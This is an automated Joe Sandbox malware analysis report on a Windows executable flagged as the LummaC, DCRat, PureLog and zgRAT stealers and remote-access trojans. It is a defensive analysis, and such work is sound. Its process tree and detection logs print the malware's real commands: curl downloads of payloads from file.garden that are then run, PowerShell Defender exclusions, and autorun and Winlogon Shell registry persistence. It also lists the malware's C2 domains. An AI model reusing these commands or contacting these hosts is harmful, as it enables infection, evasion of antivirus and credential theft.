Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4tXm5yPtiy.exe

Overview

General Information

Sample name:4tXm5yPtiy.exe
renamed because original name is a hash value
Original sample name:a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40.exe
Analysis ID:1522831
MD5:cc9824f9940392c9172e05078982caab
SHA1:0f4e458f24b461d3529ea30bbb1dbc30f8dbc1da
SHA256:a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40
Tags:exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to resolve many domain names, but no domain seems valid
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4tXm5yPtiy.exe (PID: 768 cmdline: "C:\Users\user\Desktop\4tXm5yPtiy.exe" MD5: CC9824F9940392C9172E05078982CAAB)
    • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2056 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 2332 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • kdmapper.exe (PID: 2340 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)
      • wscript.exe (PID: 3032 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msedge.exe (PID: 4584 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
            • csc.exe (PID: 3344 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 2512 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 2916 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • powershell.exe (PID: 3532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 5288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 6708 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 3828 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 3660 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 4884 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • msedge.exe (PID: 6872 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 2976 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • physmeme.exe (PID: 3500 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)
      • conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 5012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 5652 cmdline: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 2616 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2108 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 4536 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 3148 cmdline: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
        • cmd.exe (PID: 3780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 1196 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • w32tm.exe (PID: 7140 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 2940 cmdline: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 3848 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 1872 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 6892 cmdline: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 4648 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 4448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5308 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 2556 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • msedge.exe (PID: 6324 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 3908 cmdline: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["tearrybyiwo.shop", "surveriysiop.shop", "tiddymarktwo.shop", "tendencerangej.shop", "fossillargeiw.shop", "appleboltelwk.shop", "coursedonnyre.shop", "captainynfanw.shop", "strappystyio.shop"], "Build id": "1AsNN2--5899070203"}
SourceRuleDescriptionAuthorStrings
C:\Edge\msedge.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Edge\msedge.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\Speech\kdmapper.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: msedge.exe PID: 4584JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 2 entries
                      SourceRuleDescriptionAuthorStrings
                      5.3.kdmapper.exe.66016cf.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        5.3.kdmapper.exe.66016cf.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          15.0.msedge.exe.c90000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            15.0.msedge.exe.c90000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              5.3.kdmapper.exe.66016cf.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 5 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 2916, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4584, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wCnmgKwwXYQbWeNvWeCCOp
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4584, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", ProcessId: 3344, ProcessName: csc.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4tXm5yPtiy.exe", ParentImage: C:\Users\user\Desktop\4tXm5yPtiy.exe, ParentProcessId: 768, ParentProcessName: 4tXm5yPtiy.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 2056, ProcessName: cmd.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 2340, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 3032, ProcessName: wscript.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 4584, TargetFilename: C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe

                                Data Obfuscation

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", ProcessId: 3344, ProcessName: csc.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:36.659116+020020546531A Network Trojan was detected192.168.2.849711104.21.84.213443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:36.659116+020020498361A Network Trojan was detected192.168.2.849711104.21.84.213443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.053128+020020560361Domain Observed Used for C2 Detected192.168.2.8571621.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.028835+020020560401Domain Observed Used for C2 Detected192.168.2.8637081.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.091139+020020560421Domain Observed Used for C2 Detected192.168.2.8641561.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.078528+020020560461Domain Observed Used for C2 Detected192.168.2.8532561.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.101467+020020560521Domain Observed Used for C2 Detected192.168.2.8535021.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.017153+020020560541Domain Observed Used for C2 Detected192.168.2.8556171.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.039669+020020560561Domain Observed Used for C2 Detected192.168.2.8651961.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.065314+020020560581Domain Observed Used for C2 Detected192.168.2.8579031.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:25:34.002554+020020561721Domain Observed Used for C2 Detected192.168.2.8500971.1.1.153UDP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: 4tXm5yPtiy.exeAvira: detected
                                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                                Source: C:\Users\user\Desktop\DqsZwsEl.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\MQUzRRxE.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Edge\msedge.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
